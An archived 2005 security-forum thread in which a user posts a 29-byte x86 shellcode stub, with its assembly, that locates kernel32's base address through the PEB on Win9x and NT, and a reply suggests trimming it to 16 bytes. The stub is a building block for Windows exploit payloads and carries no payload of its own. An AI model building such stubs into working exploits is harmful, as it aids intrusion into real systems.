Shellcode : Peb Method 29 Bytes

Full Version: Shellcode : Peb Method 29 Bytes

GovernmentSecurity.org > System Security > Windows Systems

touk

Jul 28 2005, 11:38 AM

CODE

//
// PEB way of getting kernel32 imagebase by loco.
// Compatible with all Win9x/NT based operating systems.
//
// Gives kernel32 imagebase in eax when executing.
// 29 bytes, only eax/esi used.
//
// Originally discovered by Dino Dai Zovi.
//
//

#include <stdio.h>

/*
xor eax, eax
add eax, fs:[eax+30h]
js method_9x

method_nt:
mov eax, [eax + 0ch]
mov esi, [eax + 1ch]
lodsd
mov eax, [eax + 08h]
jmp kernel32_ptr_found

method_9x:
mov eax, [eax + 34h]
lea eax, [eax + 7ch]
mov eax, [eax + 3ch]
kernel32_ptr_found:
*/

unsigned char Shellcode[] =
"\x33\xC0" // xor eax, eax
"\x64\x03\x40\x30" // add eax, dword ptr fs:[eax+30]
"\x78\x0C" // js short $+12
"\x8B\x40\x0C" // mov eax, dword ptr [eax+0C]
"\x8B\x70\x1C" // mov esi, dword ptr [eax+1C]
"\xAD" // lodsd
"\x8B\x40\x08" // mov eax, dword ptr [eax+08]
"\xEB\x09" // jmp short $+9
"\x8B\x40\x34" // mov eax, dword ptr [eax+34]
"\x8D\x40\x7C" // lea eax, dword ptr [eax+7C]
"\x8B\x40\x3C" // mov eax, dword ptr [eax+3C]
; // = 29 bytes.

int main()
{
printf("Shellcode is %u bytes.\n\n", sizeof(Shellcode)-1);
return 1;
}

nolimit

Jul 29 2005, 02:34 AM

This method is old, and originated from hick.org by matt miler. Also, you can take out the 9x portion as it's pretty much useless and then it's only 16 bytes.

touk

Jul 29 2005, 10:59 AM

QUOTE(nolimit @ Jul 29 2005, 02:34 AM)

This method is old, and originated from hick.org by matt miler. Also, you can take out the 9x portion as it's pretty much useless and then it's only 16 bytes.

Thx for the info, Im new with shellcode but it's really an interesting subject not so much explained on GSO. 16 bytes much better, gonna give a try.

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.